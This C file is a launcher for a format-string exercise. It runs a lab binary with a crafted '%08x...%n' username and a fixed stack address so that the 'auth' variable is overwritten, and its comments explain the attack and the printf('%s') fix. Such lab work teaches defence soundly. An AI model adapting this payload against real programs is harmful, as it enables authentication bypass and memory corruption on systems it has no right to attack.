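/*
 * Launcher for the format-string exercise in target-q2: it execs the target
 * with a crafted username and a userid that carries a stack address.
 *
 * The original's four #include lines lost their header names in extraction;
 * <stdio.h> (fprintf/perror), <stdlib.h> (EXIT_*) and <unistd.h> (execve)
 * cover everything the visible code uses.
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Path of the vulnerable binary; it is both the file executed and argv[0]. */
#define TARGET "/home/maluser/Q2/target-q2"

/*
 * Exec TARGET with a fixed argv/envp. Never returns on success; on failure
 * prints the errno text and exits non-zero so a caller can tell the
 * difference (the original returned 0 on the failure path as well).
 */
int main(void)
{
    char *args[4];
    char *env[2];

    args[0] = TARGET;
    /* This gets passed in as username.
     * Use %08x to move printf's pointer to userid's location
     * on the stack. userid contains the address of auth and the
     * %n will print the number of bytes written
     * (4 - the four 'A's) to this address. In other words, the %n
     * will cause auth to be overwritten with the value 4.
     *
     * This only works because the target hands the username to printf as
     * the format string itself; a target that does printf("%s", username)
     * is not affected, which is the fix on the defending side. */
    args[1] = "AAAA%08x%08x%08x%08x%08x%08x%08x%n";
    /* This gets passed in as userid.
     * Use the userid parameter to pass in the address of auth
     * (a fixed stack address from the exercise; ASLR or a rebuilt target
     * would move it, which is why the exercise pins it). */
    args[2] = "0xbffffe2c";
    args[3] = NULL;

    /* Minimal, fixed environment. The original gives no reason; presumably
     * it keeps the target's stack addresses reproducible -- unconfirmed. */
    env[0] = "FOO=bar";
    env[1] = NULL;

    /* execve() only returns when it fails, and then errno says why. */
    if (execve(TARGET, args, env) < 0) {
        perror("execve failed");
        return EXIT_FAILURE;
    }
    return EXIT_SUCCESS; /* not reached */
}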